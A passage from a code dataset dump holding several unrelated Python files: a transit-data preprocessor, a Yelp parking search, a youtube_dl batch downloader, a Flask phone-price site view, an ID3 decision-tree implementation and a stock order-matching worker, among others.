ang), 360.)\n return ang\n\n\ndef _demo(xc=0, yc=0, fromNorth=True):\n \"\"\" run the demo with the data below \"\"\"\n p0 = np.array([xc, yc]) # origin point\n p1 = p0 + [-1, 1] # NW\n p2 = p0 + [0, 1] # N\n p3 = p0 + [1, 1] # NE\n p4 = p0 + [1, 0] # E\n p5 = p0 + [1, -1] # SE\n p6 = p0 + [0, -1] # S\n p7 = p0 + [-1, -1] # SW\n p8 = p0 + [-1, 0] # W\n #\n od = [[p0, p1], [p0, p2], [p0, p3], [p0, p4],\n [p0, p5], [p0, p6], [p0, p7], [p0, p8]]\n for pair in od:\n orig, dest = pair\n ang = line_dir(orig, dest, fromNorth=fromNorth)\n if fromNorth:\n dir = \"From N.\"\n else:\n dir = \"From x-axis\"\n args = [orig, dest, dir, ang]\n print(\"orig: {}: dest: {!s:<8} {}: {!s:>6}\".format(*args))\n return od\n\n\n# ---------------------------------------------------------------------\nif __name__ == \"__main__\":\n \"\"\"Main section... \"\"\"\n# print(\"Script... {}\".format(script))\n xc = 0 # 300000 # pick an origin x 0 or 300000 for example\n yc = 0 # 5025000 # pick an origin y 0 or 5025000\n od = _demo(xc, yc, fromNorth=True)\n","repo_name":"Dan-Patterson/arraytools","sub_path":"arraytools/analysis/line_ang_azim.py","file_name":"line_ang_azim.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"31903970587","text":"\"\"\"\nThis file processes the raw CSVs downloaded in make_dataset.py for a specific transportation system.\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom transit_data import BRTData, NTDData\nimport os\n\n# --------------------------------------------\n# HELPER FUNCTIONS\n# --------------------------------------------\n\ndef make_average(df, name) -> pd.Series:\n series_average = df.mean(axis=1)\n series_average.rename(name, inplace=True)\n\n return series_average\n\ndef export_csv(df, name) -> None:\n script_dir = os.path.dirname(os.path.abspath(__file__))\n project_dir = os.path.abspath(os.path.join(script_dir, \"../..\"))\n data_dir = os.path.join(project_dir, \"data/processed\")\n \n df.to_csv(os.path.join(data_dir, f'{name}.csv'), index=True)\n\n# --------------------------------------------\n# DATA PROCESSING FUNCTIONS\n# --------------------------------------------\n\ndef process_brt_data(brt_data: BRTData) -> pd.DataFrame:\n \"\"\"\n Clean and process BRTData for various metrics and return a pandas DataFrame of the resulting average values.\n\n Parameters:\n brt_data (BRTData): BRTData object to process.\n\n Returns:\n pandas.Dataframe: A pandas DataFrame of the resulting average values for each metric.\n \"\"\"\n metrics = ['income', 'pop', 'age', 'house_married', 'house_nonfam', 'house_m_single', 'house_f_single', 'car', 'biz']\n series_list = []\n\n for metric in metrics:\n df = brt_data.get_data(metric)\n \n # Cleaning\n df.dropna(axis=1, how='all', inplace=True) # drop cols with all NaN's\n df = df.loc[:, ~(df < 0).any(axis=0)] # drop cols that feature any negative\n df = df.loc[:, df.eq(0).mean() <= 0.25] # only keep cols with 25% or fewer values that are still 0\n\n series_average = make_average(df, metric)\n series_list.append(series_average)\n\n return pd.concat(series_list, axis=1)\n\n\ndef process_ntd_data(ntd_data: NTDData, system: str) -> pd.DataFrame:\n \"\"\"\n Clean and process NTDData and return a pandas DataFrame of the resulting values for a specific system.\n\n Parameters:\n ntd_data (NTDData): An object containing NTD data.\n system (str): A string representing the transit system for which data is being processed.\n \n Return type:\n pandas.DataFrame: A cleaned DataFrame containing summarized and filtered data for the specified system.\n \"\"\"\n\n ids = {\n # 'brooklyn': '2008',\n 'los_angeles': '9154',\n 'boston': '1003',\n 'houston': '6008',\n 'orlando': '4035',\n 'cleveland': '5015',\n 'richmond': '3006',\n 'kansas': '7005',\n 'grand_rapids': '5033',\n 'hartford': '1048',\n 'eugene': '7',\n 'indianapolis': '5050',\n 'albuquerque': '6019',\n 'aspen_westcliffe_glenwood_springs': '8R01-013',\n 'fort_collins': '8011'\n }\n \n years = list(range(2013, 2021))\n cols = ['Unlinked Passenger Trips', 'Primary UZA\\n Population', 'UZA Population', 'Mode VOMS', 'VOMS', 'Annual Vehicle Revenue Miles', 'Vehicle Revenue Miles']\n res_df = pd.DataFrame(columns = cols, index = years)\n\n for year in years:\n df_raw = ntd_data.get_data(f'transit_data_{year}_filtered')\n \n if year == 2013:\n df_raw = df_raw.fillna(0)\n df_raw['ID'] = df_raw['ID'].astype(int).astype(str)\n filtered_df = df_raw[df_raw[\"ID\"].astype(str) == ids[system]]\n elif year == 2014:\n filtered_df = df_raw[df_raw[\"Legacy NTDID\"].astype(str) == ids[system]]\n else: \n filtered_df = df_raw[df_raw[\"Legacy NTD ID\"].astype(str) == ids[system]]\n \n df_year = filtered_df.loc[:, filtered_df.columns.isin(cols)] \n\n # Populate res_df\n for col in cols:\n try:\n res_df.at[year, col] = df_year[col][0]\n except:\n res_df.at[year, col] = np.NaN\n\n res_df.rename(columns={'Primary UZA\\n Population': 'Primary UZA Population'}, inplace=True)\n\n # Merge duplicate cols\n res_df['UZA Population'].update(res_df.pop('Primary UZA Population'))\n res_df['VOMS'].update(res_df.pop('Mode VOMS'))\n res_df['Vehicle Revenue Miles'].update(res_df.pop('Annual Vehicle Revenue Miles'))\n\n # Column name cleaning - lowercase and space replacement\n res_df.columns= res_df.columns.str.lower()\n res_df.columns = res_df.columns.str.replace(' ', '_')\n\n # Cleaning values - removing commas from float fields that are mis-cast\n res_df.replace(',','', regex=True, inplace=True)\n res_df = res_df.astype({'unlinked_passenger_trips':'float'})\n res_df = res_df.astype({'uza_population':'float'})\n res_df = res_df.astype({'vehicle_revenue_miles':'float'})\n\n # Adjusting values off by 3 orders of magnitude somehow\n mean = res_df.mean()\n std = res_df.std()\n\n # Handling edge cases\n if system in ('cleveland', 'orlando'):\n res_df.loc[(abs(mean.unlinked_passenger_trips - res_df['unlinked_passenger_trips']) > std.unlinked_passenger_trips) & (res_df.index < 2015), 'unlinked_passenger_trips'] *= 1000\n res_df.loc[(abs(mean.vehicle_revenue_miles - res_df['vehicle_revenue_miles']) > std.vehicle_revenue_miles) & (res_df.index < 2015), 'vehicle_revenue_miles'] *= 1000\n\n elif system not in ('aspen_westcliffe_glenwood_springs', 'hartford', 'richmond'):\n res_df.loc[abs(mean.unlinked_passenger_trips - res_df['unlinked_passenger_trips']) > std.unlinked_passenger_trips, 'unlinked_passenger_trips'] *= 1000\n res_df.loc[abs(mean.vehicle_revenue_miles - res_df['vehicle_revenue_miles']) > std.vehicle_revenue_miles, 'vehicle_revenue_miles'] *= 1000\n\n return res_df\n\ndef process_data(brt_data: BRTData, ntd_data: NTDData, system: str) -> None:\n \"\"\"\n Process BRTData and NTDData and merge the results into a dataframe. Export the merged dataframe to a CSV file.\n\n Args:\n brt_data (BRTData): the BRTData object containing the data to process.\n ntd_data (NTDData): the NTDData object containing the data to process.\n system (str): the name of the transit system to process. Used to filter NTD data.\n\n Returns:\n None. The function writes the merged dataframe to a CSV file.\n \"\"\"\n brt_df = process_brt_data(brt_data)\n ntd_df = process_ntd_data(ntd_data, system)\n\n # Merge the dfs\n merged_df = pd.concat([brt_df, ntd_df], axis=1)\n merged_df = merged_df.round(2)\n merged_df.insert(0, 'system', system)\n\n # Export the df to a CSV\n export_csv(merged_df, system)\n\ndef main():\n locations = ['cleveland', 'houston', 'kansas', 'richmond', 'indianapolis', 'eugene', 'albuquerque', 'aspen_westcliffe_glenwood_springs', 'fort_collins', 'hartford', 'grand_rapids', 'orlando', 'boston', 'los_angeles']\n ntd = NTDData()\n ntd.load_existing_data()\n \n for system in locations:\n brt = BRTData(system)\n brt.load_existing_data()\n process_data(brt, ntd, system)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"hudyu17/transit-model","sub_path":"model/src/data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41164255321","text":"import requests\nimport json\n\n'''\nddress, an image if available, star rating, review count, and link to the Yelp page.\n\n'''\n\ndef search(location):\n api_key=''\n headers = {'Authorization': 'Bearer %s' % api_key}\n\n url='https://api.yelp.com/v3/businesses/search'\n\n params = {'term':'parking','location': location}\n req = requests.get(url, params=params, headers=headers)\n\n # printing the text from the response\n results = json.loads(req.text)\n businesses = results['businesses']\n businesses = sorted(businesses, key = lambda i:i['rating'])\n ret = []\n for b in businesses:\n id = b['id']\n address = b['location']\n image = b['image_url']\n rating = b['rating']\n reviews = b['review_count']\n yelp_link = b['url']\n #score = ( number of reviews * rating ) / (number of reviews + 1)\n score = (int(reviews) * int(rating)) / (reviews + 1)\n ret.append({'score':score, 'address':address, 'image':image, 'rating': rating, 'reviews':reviews, 'yelp_link':yelp_link})\n\n return ret\n\nsearch('Los Angeles')\n","repo_name":"n0remac/LowestRatedParkingLot","sub_path":"ratings/get_lots.py","file_name":"get_lots.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39328214743","text":"from __future__ import unicode_literals\nimport pandas\nimport youtube_dl\n\nin_file = \"D:\\TREASURE\\Music\\carnatic_lesson.xlsx\"\n\nvocal_df = pandas.read_excel(in_file, \"VOCAL\")\nflute_df = pandas.read_excel(in_file, \"FLUTE\")\n\nfor index, row in vocal_df.iterrows():\n url = row[\"Youtube Link\"]\n # print (row[\"Youtube Link\"])\n outtemplate = str(index + 1) + \"-VOCAL\" + \"-%(title)s.%(ext)s\"\n ydl_opts = {\n 'outtmpl': outtemplate\n }\n # print (outtemplate)\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([url])\n\n\n\n# help(youtube_dl)","repo_name":"VINEET277/scriptsRef1","sub_path":"scriptsRef_One/jCodes-master/codeSnippets-master/youtube-dl-pandas.py","file_name":"youtube-dl-pandas.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13357967340","text":"# coding: utf-8 \nimport operator\nimport json\nclass commonUtil:\n\t\n\tdef is_contain(self, str_one, str_two):\n\t\t'''\n\t\t判断一个字符串是否在另一个字符串中\n\t\tstr_one:查找的字符串\n\t\tstr_two:被查找的字符串\n\t\t'''\n\t\tflag = None\n\t\tif str_one in str_two:\n\t\t\tflag = True\n\t\telse:\n\t\t\tflag = False\n\t\treturn flag\n\n\n\tdef is_equal(self, dict_one, dict_two):\n\t\t'''\n\t\t判断两个字典是否相等\n\t\t'''\n\t\tif isinstance(dict_one, str):\n\t\t\tdict_one = json.loads(dict_one)\n\t\tif isinstance(dict_two, str):\n\t\t\tdict_two = json.loads(dict_two)\n\t\tresult = operator.eq(dict_one, dict_two)\n\t\treturn result\n\nif __name__ == '__main__':\n\ta = {\n\t\t\"name\":\"guan\",\n\t\t\"age\":\"25\"\n\t}\n\tb = {\n\t\t\"name\":\"guan\",\n\t\t\"age\":\"25\"\n\t}\n\tcom = commonUtil()\n\tc = com.is_equal(a,b)\n\tprint(c)\n","repo_name":"Torres-guan/Mytest","sub_path":"Util/common_util.py","file_name":"common_util.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24211105900","text":"#\n# [163] Missing Ranges\n#\n# https://leetcode.com/problems/missing-ranges\n#\n# algorithms\n# Medium (23.84%)\n# Total Accepted: 32.5K\n# Total Submissions: 136.1K\n# Testcase Example: '[0,1,3,50,75]\\n0\\n99'\n#\n#\n# Given a sorted integer array where the range of elements are in the inclusive\n# range [lower, upper], return its missing ranges.\n#\n#\n# For example, given [0, 1, 3, 50, 75], lower = 0 and upper = 99, return [\"2\",\n# \"4->49\", \"51->74\", \"76->99\"].\n#\n#\n\nclass Solution(object):\n def findMissingRanges(self, nums, lower, upper):\n \"\"\"\n :type nums: List[int]\n :type lower: int\n :type upper: int\n :rtype: List[str]\n \"\"\"\n res = []\n nums.append(upper+1)\n p = lower\n for num in nums:\n if num > p:\n if num == p+1:\n res.append(str(p))\n else:\n res.append(\"->\".join([str(p), str(num-1)]))\n p = num+1\n return res\n\n","repo_name":"Iverance/leetcode","sub_path":"163.missing-ranges.py","file_name":"163.missing-ranges.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"86745920447","text":"import subprocess\nfrom typing import List, Optional, Callable, Union\n\n\ndef collect_output_from_command(\n command: Union[List[str], str],\n stdout: Optional[Callable[[str], None]] = None,\n stderr: Optional[Callable[[str], None]] = None,\n shell=False,\n) -> str:\n p = subprocess.Popen(\n command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=shell\n )\n\n outs, errs = p.communicate(timeout=15)\n outs, errs = outs.decode(), errs.decode()\n if stderr is not None:\n for e in errs.splitlines():\n if e:\n stderr(e)\n if stdout is not None:\n for o in outs.split():\n stdout(o)\n\n rc = p.poll()\n if rc is not None and rc > 0:\n # failed :(\n jc = command\n if shell and isinstance(jc, list):\n jc = \" \".join(f\"'{c}'\" for c in command)\n\n lastlines = errs[: min(len(errs) - 1, 100)]\n if isinstance(lastlines, list):\n lastlines = \"\".join(lastlines)\n raise Exception(\n f'Failed to call command (rc={rc}) {jc}, first 100 characters of stderr:\\n \"{lastlines}\"'\n )\n\n return outs\n","repo_name":"PMCC-BioinformaticsCore/janis-assistant","sub_path":"janis_assistant/utils/callprogram.py","file_name":"callprogram.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"9147157096","text":"from flask import Blueprint, render_template, request, url_for\nfrom fuzzywuzzy import fuzz\n\nfrom models import db, Phone, PhoneShop, Shop, normalize_name\nfrom webapp.config import ITEMS_PER_PAGE\n\nblueprint = Blueprint('main', __name__)\n\n\n@blueprint.route('/')\n@blueprint.route('/index')\ndef index():\n title = 'Смартфоны'\n text = request.args.get('search')\n how = request.args.get('how')\n nothing_found = True\n\n if text:\n if how == 'pop':\n all_phones = Phone.query.order_by(Phone.views).all()\n else:\n all_phones = Phone.query.all()\n phones = []\n for phone in all_phones:\n ratio1 = fuzz.partial_ratio(normalize_name(phone.name), text)\n ratio2 = fuzz.token_set_ratio(normalize_name(phone.name), text)\n if ratio1 + ratio2 == 200:\n phones = [phone]\n break\n if ratio1 + ratio2 > 150:\n phones.append([phone, ratio1 + ratio2])\n if len(phones) > 1:\n phones = [i[0] for i in sorted(phones, key=lambda x: x[1], reverse=True)]\n if phones:\n nothing_found = False\n return render_template('main/index.html', page_title=title, phones=get_prices(phones),\n nothing_found=nothing_found)\n\n nothing_found = False\n page = request.args.get('page', 1, type=int)\n if how == 'pop':\n phones = Phone.query.order_by(Phone.views.desc()).paginate(page, ITEMS_PER_PAGE, False)\n elif how == 'price':\n phones = db.session.query(PhoneShop.phone_id, db.func.min(PhoneShop.price).label('min_price')) \\\n .group_by(PhoneShop.phone_id, PhoneShop.price).order_by(PhoneShop.price.desc()) \\\n .paginate(page, ITEMS_PER_PAGE, False)\n else:\n phones = Phone.query.paginate(page, ITEMS_PER_PAGE, False)\n next_url = url_for('main.index', page=phones.next_num) if phones.has_next else None\n prev_url = url_for('main.index', page=phones.prev_num) if phones.has_prev else None\n if how == 'price':\n phones_price_sorted = {}\n for item in phones.items:\n phones_price_sorted[Phone.query.filter_by(id=item.phone_id).first()] = round(item.min_price)\n phones = phones_price_sorted\n else:\n phones = get_prices(phones.items)\n\n return render_template('main/index.html', page_title=title, phones=phones,\n nothing_found=nothing_found, next_url=next_url, prev_url=prev_url, how=how)\n\n\ndef get_prices(phones):\n \"\"\" Функция формирует словарь {телефон: минимальная_цена} для последующего вывода в шаблоне\"\"\"\n\n out = {}\n for phone in phones:\n prices = [round(shop.price) for shop in phone.shops if shop.price]\n out[phone] = str(min(prices)) if prices else None\n return out\n\n\n@blueprint.route('/specs')\ndef show_specs():\n phone_id = request.args.get('phone_id', None)\n phone = Phone.query.filter_by(id=phone_id).first()\n if not phone:\n return render_template('errors/404.html')\n views = 1 if not phone.views else phone.views + 1\n Phone.query.filter_by(id=phone.id).update({'views': views})\n db.session.commit()\n price_queries = PhoneShop.query.filter_by(phone_id=phone_id).all()\n prices = []\n for query in price_queries:\n shop = Shop.query.filter_by(id=query.shop_id).first()\n if not query.price:\n continue\n price = str(round(query.price))\n price = price[:len(price) - 3] + ' ' + price[-3:]\n shop_name = shop.name\n url = shop.phones_path + query.external_id\n prices.append([shop_name, price, url])\n if not prices:\n prices = [[], [], []]\n return render_template('main/specs.html', phone=phone, prices=prices, page_title=phone.name)\n\n\n@blueprint.route('/about')\ndef about():\n return render_template('main/about.html')\n","repo_name":"borshchevsky/stuff_finder","sub_path":"webapp/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32321816530","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport random\nfrom sklearn import utils\n\n\nclass Arbol(object):\n \n def __init__(self):\n self.Ramas = []\n self.valor = None\n\n'Funcion que devuelve True si el Arbol es una hoja'\ndef EsHoja(Arbol):\n return (len(Arbol.Ramas)==0)\n\n\n'Funcion para calcular entropia'\ndef Entropia(ColOutput): \n Valores, ocurrencias = np.unique(ColOutput,return_counts = True)\n CantTotal = np.sum(ocurrencias)\n E = 0\n #itero en los valores posibles de salida\n for indice in range(len(Valores)):\n P_X = ocurrencias[indice]/CantTotal\n E += - P_X*np.log2(P_X)\n return E\n\n\n'Funcion para calcular termino sumatoria de Information Gain'\ndef IGAux(Datos, atributo): \n Valores, ocurrencias = np.unique(Datos[atributo],return_counts = True)\n CantTotal = np.sum(ocurrencias)\n IGAux = 0\n \n for indice in range(len(Valores)):\n #me quedo solo con las filas que tienen valor Valores[indice] en el atributo y calculo cantidad registros\n mask = Datos[atributo].to_numpy() == Valores[indice]\n Datos_con_atributoValor = Datos.loc[mask]\n CantAt = ocurrencias[indice]\n #actualizo IGAux\n IGAux += (CantAt/CantTotal)*Entropia(Datos_con_atributoValor['output'])\n\n return IGAux\n\n\n\"\"\"Funcion para calcular los posibles valores de los atributos.\nDevuelve una lista de arrays con donde cada array contiene los posibles valores de del Atributo indice\"\"\"\ndef ValsAtributos(Datos, Atributos):\n ValsAtrib = []\n for indice in range(len(Atributos)):\n Valores = np.unique(Datos[Atributos[indice]])\n ValsAtrib.insert(indice, Valores)\n return ValsAtrib \n \n \n'Funcion que devuele el arbol de decision. No implelmenta podas'\ndef ID3(Datos,targetAttribute, Atributos, ValsAtributos, maxAtributos):\n \n #guardo en el array Valores, todos los valores diferentes de la columna objetivo.\n #guardo en ocurrencias la cantidad de veces que aparecen los valores de Valores\n Valores, ocurrencias = np.unique(Datos[targetAttribute],return_counts = True)\n Arb = Arbol()\n \n #si todos los valores son iguales, devuelvo ese valor\n if (len(Valores)==1):\n Arb.valor = Valores[0]\n \n #si no hay atributos, retorno el valor mas comun del atributo objetivo para los datos. \n #aplico poda si no tengo un minimo de 10 datos\n elif (len(Atributos)==0) or (Datos.shape[0]<10):\n Arb.valor = Valores[np.argmax(ocurrencias)]\n \n else:\n #elijo de forma aleatoria maxAtributos indices en el rango del largo de Atributos\n if (len(Atributos)> maxAtributos):\n arraysubset = np.array(random.sample(list(range(len(Atributos))), maxAtributos))\n sbsetAtributos = [Atributos[i] for i in arraysubset]\n subsetValoresAtributos = [ValsAtributos[i] for i in arraysubset]\n else:\n sbsetAtributos = Atributos\n subsetValoresAtributos = ValsAtributos\n \n #seleccionar el mejor atributo\n E = Entropia(Datos[targetAttribute])\n IG_AuxAtributos = [(E-IGAux(Datos,at)) for at in sbsetAtributos] #devuelve IG de todos los at de Atributos\n Atributo_indice = np.argmax(IG_AuxAtributos)\n Atributo = sbsetAtributos[Atributo_indice]\n \n # si ningun atributo me da ganancia, aplico poda\n if(E-IG_AuxAtributos[Atributo_indice]==0):\n Arb.valor = Valores[np.argmax(ocurrencias)]\n else:\n \n #Coloco en la raiz Atributo \n Arb.valor = Atributo\n \n #Array con valores de Atributo. \n ValoresAtributoAux = np.array(subsetValoresAtributos[Atributo_indice], copy=True) \n \n #obtengo indice de Atributo en Atributos\n indice = Atributos.index(Atributo) \n #elimino el atributo de la lista\n del Atributos[indice]\n del ValsAtributos[indice]\n \n #hago crecer el arbol, iterando en cada valor posible del atributo\n for i in range(len(ValoresAtributoAux)):\n val = ValoresAtributoAux[i]\n Ejemplos = Datos.loc[Datos[Atributo] == val]\n \n # si no hay ejemplos con ese valor, coloco hoja con el valor mas comun del atributo objetivo para los datos. \n if (len(Ejemplos)==0):\n Hoja = Arbol()\n Hoja.valor = Valores[np.argmax(ocurrencias)]\n Arb.Ramas.insert(i,Hoja)\n #sino, llamo recursivo\n else:\n Arb.Ramas.insert(i, ID3(Ejemplos, targetAttribute, Atributos, ValsAtributos, maxAtributos)) \n return Arb\n\n\n\"\"\" Funcion que evalua una instancia en el Arbol de decision. \ndevuelve 7 valores, que pueden tomar valores binarios.\nA = 1 si Acierto, Vp= verdadero positivo, Vn= verdadero negativo,\nFp = falso psitivo, Fn= falso negativo, P= isntancia Positiva, N= instancia Negativa\n\"\"\"\ndef EvaluarInstancia (instancia, targetAtribute, Arbol, ValsAtributos, Atributos):\n if (EsHoja(Arbol)):\n A, Vp, Vn, Fp, Fn, P,N = 0,0,0,0,0,0,0\n if instancia[targetAtribute] == Arbol.valor:\n A = 1\n #ejemplo positivo clasificado correctamente\n if instancia[targetAtribute] == 1: Vp, P = 1,1\n #ejemplo negativo clasificado correctamente\n else: Vn,N = 1,1\n else: \n #ejemplo negativo clasificado incorrectamente\n if instancia[targetAtribute] == 0: Fp,N = 1,1\n #ejemplo positivo clasificado incorrectamente\n else: Fn, P = 1,1 \n return (A, Vp, Vn, Fp, Fn, P, N)\n else:\n AtributoNodo= Arbol.valor\n valorInstancia = instancia[AtributoNodo]\n indice = Atributos.index(AtributoNodo) #obtengo indice de AtributoNodo en Atributos\n PosiblesvaloresAtributoNodo = ValsAtributos[indice] #obtengo rango de valores de AtributoNodo\n indexValorInstancia = list(PosiblesvaloresAtributoNodo).index(valorInstancia) #obtengo indice de valorInstancia en posibles valores de atributo\n return EvaluarInstancia(instancia, targetAtribute, Arbol.Ramas[indexValorInstancia], ValsAtributos, Atributos)\n\n \n'Metodo que evalua un dataset en el Arbol de decision e imprime metricas'\ndef Evaluar(Datos, targetAtribute, Arbol, ValsAtributos, Atributos):\n A, Vp, Vn, Fp, Fn, CantP, CantN = 0,0,0,0,0,0,0\n for i in range(Datos.shape[0]):\n Fila = Datos.iloc[i]\n Ai, Vpi, Vni, Fpi, Fni, P, N = EvaluarInstancia (Fila, targetAtribute, Arbol, ValsAtributos, Atributos)\n A += Ai\n Vp += Vpi\n Vn += Vni\n Fp += Fpi\n Fn += Fni\n CantP += P\n CantN += N\n \n print (\"Accurancy: \" + str(A/Datos.shape[0]))\n \n if (CantP>0): \n print(\"ejemplos positivos: \" + str(CantP))\n print(\"ejemplos positivos acertados: \" + str(Vp))\n if ((Vp + Fp)==0):\n print(\"Ningun ejemplo fue clasificado como positivo por lo que Precision no puede calcularse\")\n PresicionPositivos =0\n else:\n PresicionPositivos = Vp/(Vp + Fp)\n print(\"Precision 1: \" + str(PresicionPositivos))\n RecallPositivos = Vp/(Vp + Fn)\n print(\"Recall 1: \" + str(RecallPositivos))\n if (PresicionPositivos>0) and (RecallPositivos>0):\n print(\"F1 1: \" + str(2*PresicionPositivos*RecallPositivos/(PresicionPositivos+RecallPositivos)))\n else:\n print(\"Ningun ejemplo positivo fue acertado por lo que F1 no puede calcularse\")\n else:\n print(\"No hay ejemplos positivos en el conjunto de test\")\n \n if (CantN>0): \n print(\"ejemplos Negativos: \" + str(CantN))\n print(\"ejemplos Negativos acertados: \" + str(Vn))\n if ((Vn + Fn)==0):\n print(\"Ningun ejemplo fue clasificado como negativo por lo que Precision no puede calcularse\")\n PresicionNegativos =0\n else:\n PresicionNegativos = Vn/(Vn + Fn)\n print(\"Precision 0: \" + str(PresicionNegativos))\n RecallNegativos = Vn/(Vn + Fp)\n print(\"Recall 0: \" + str(RecallNegativos))\n if (PresicionNegativos>0) and (RecallNegativos>0):\n print(\"F1 0: \" + str(2*PresicionNegativos*RecallNegativos/(PresicionNegativos+RecallNegativos)))\n else:\n print(\"Ningun ejemplo negativo fue acertado por lo que F1 no puede calcularse\")\n else:\n print(\"No hay ejemplos negativos en el conjunto de test\")\n\n\n'Metodo para crear un arbol de decision y evaluar su performance'\ndef CreacionYEvaluacionID3(dataset, train, validation, CantidadEjemplos, CantAtributos):\n #Genero Dataset con CantElementos, tomando de forma uniforme de Datos\n DatasetArbol = utils.resample(train, n_samples= CantidadEjemplos)\n \n #obtengo todas las cabeceras de columnas y borro de la lista las columnas de salida, para quedarme solo con los de entrada \n Atributos = dataset.columns.values.tolist()\n Atributos.remove('c1024')\n Atributos.remove('output')\n \n #Tomo CantAtributos de Atributos de forma aleatoria, sin repetidos\n ValsAtributo = ValsAtributos(dataset, Atributos)\n \n # se utilizan estructuras auxiliares porque estas son modificadas al crear el arbol\n AtributosAux = Atributos.copy() \n ValsAtributosAux = ValsAtributos(dataset, AtributosAux)\n \n #creacion del arbol\n ArbolDecision = ID3(DatasetArbol,'output', AtributosAux, ValsAtributosAux, CantAtributos)\n \n #evaluacion\n Evaluar(validation,'output', ArbolDecision, ValsAtributo, Atributos)\n\n","repo_name":"luciabouza/Machine-Learning-Methods","sub_path":"lab2 - Classification trees and Random Forest/ID3.py","file_name":"ID3.py","file_ext":"py","file_size_in_byte":9615,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30193278541","text":"from time import sleep\nfrom math import cos, sin, tan\n\n\nprint('')\nprint('Seno, cosseno, tangente')\nprint('')\nsleep(0.35)\n\n# var angulo\nangulo = float(input('Digite o ângulo que deseja: '))\n\nprint (f'''\n\nSeno: {sin(angulo):.2f}\n\nCosseno: {cos(angulo):.2f}\n\nTangente: {tan(angulo):.2f} ''')","repo_name":"Future-Aperture/Python","sub_path":"exercícios_python/exercicios_theo/Exercicios 16-30/ex018.py","file_name":"ex018.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"37623115115","text":"import sys\nfrom trading_queue import queue\nfrom db.models import orders, users, stocks\nfrom db import Session\n\nqueue = queue.QueueClient()\n\n\ndef get_matching_order(session, order, exclude=set()):\n order_query = (\n session.query(orders.Orders)\n .\n # match the stock name\n filter(orders.Orders.stock_identifier == order.stock_identifier)\n .\n # only incomplete orders\n filter(orders.Orders.remaining_quantity > 0)\n .\n # don't allow a user to match their own order\n filter(orders.Orders.user_id != order.user_id)\n .\n # exclude orders we've already seen\n filter(orders.Orders.id.notin_(exclude))\n )\n if order.is_sell_order:\n order_query = (\n order_query.\n # search for a buy order\n filter(orders.Orders.is_sell_order == False)\n .\n # only consider buyers with prices higher than your sell price\n filter(orders.Orders.price_cents >= order.price_cents)\n .\n # if I'm selling, I want the highest buy price possible. After that, older orders first\n order_by(orders.Orders.price_cents.desc(), orders.Orders.created_ts.asc())\n )\n else:\n order_query = (\n order_query.\n # search for a sell order\n filter(orders.Orders.is_sell_order == True)\n .\n # only consider sellers with selling prices less than what you want\n # to buy it for\n filter(orders.Orders.price_cents <= order.price_cents)\n .\n # If I'm buying, I don't care which order I match with, my price is fixed. Take the oldest\n order_by(orders.Orders.created_ts.asc())\n )\n return order_query.first()\n\n\ndef update_stock_for_sale(session, seller, stock_identifier, quantity):\n stock = (\n session.query(stocks.Stocks)\n .filter(stocks.Stocks.identifier == stock_identifier)\n .filter(stocks.Stocks.user_id == seller.id)\n .first()\n )\n # sellable quantity should already be correct\n stock.quantity -= quantity\n session.commit()\n\n\ndef update_stock_for_purchase(session, buyer, stock_identifier, quantity):\n stock = (\n session.query(stocks.Stocks)\n .filter(stocks.Stocks.identifier == stock_identifier)\n .filter(stocks.Stocks.user_id == buyer.id)\n .first()\n )\n # create the stock if the user doesn't have it yet\n if not stock:\n stock = stocks.Stocks(stock_identifier, quantity)\n buyer.stocks.append(stock)\n else:\n stock.quantity += quantity\n stock.sellable_quantity += quantity\n session.commit()\n\n\ndef handle_order(ch, method, properties, body):\n order_id = int(body)\n with Session() as session:\n order = (\n session.query(orders.Orders).filter(orders.Orders.id == order_id).first()\n )\n order_creator = (\n session.query(users.Users).filter(users.Users.id == order.user_id).first()\n )\n if not order or order.remaining_quantity == 0:\n return\n matches = set()\n matching_order = get_matching_order(session, order)\n while matching_order and order.remaining_quantity > 0:\n matching_user = (\n session.query(users.Users)\n .filter(users.Users.id == matching_order.user_id)\n .first()\n )\n seller, buyer = order_creator, matching_user\n if not order.is_sell_order:\n seller, buyer = matching_user, order_creator\n # the amount of shares that overlap\n match_amount = min(\n matching_order.remaining_quantity, order.remaining_quantity\n )\n # price of the transfer per share (will be the buy order's price)\n price_per_share = max(matching_order.price_cents, order.price_cents)\n # decrease each order by the amount traded\n matching_order.remaining_quantity -= match_amount\n order.remaining_quantity -= match_amount\n # give the seller the cash, and let them use it\n seller.cash += price_per_share * match_amount\n seller.liquid_cash += price_per_share * match_amount\n # scope down the buyers cash (purchase price already factored into liquid cash)\n buyer.cash -= price_per_share * match_amount\n # move the shares\n update_stock_for_purchase(\n session, buyer, order.stock_identifier, match_amount\n )\n update_stock_for_sale(session, seller, order.stock_identifier, match_amount)\n # just to be safe, commit what we've done so far before continuing\n session.commit()\n\n # fetch another order\n 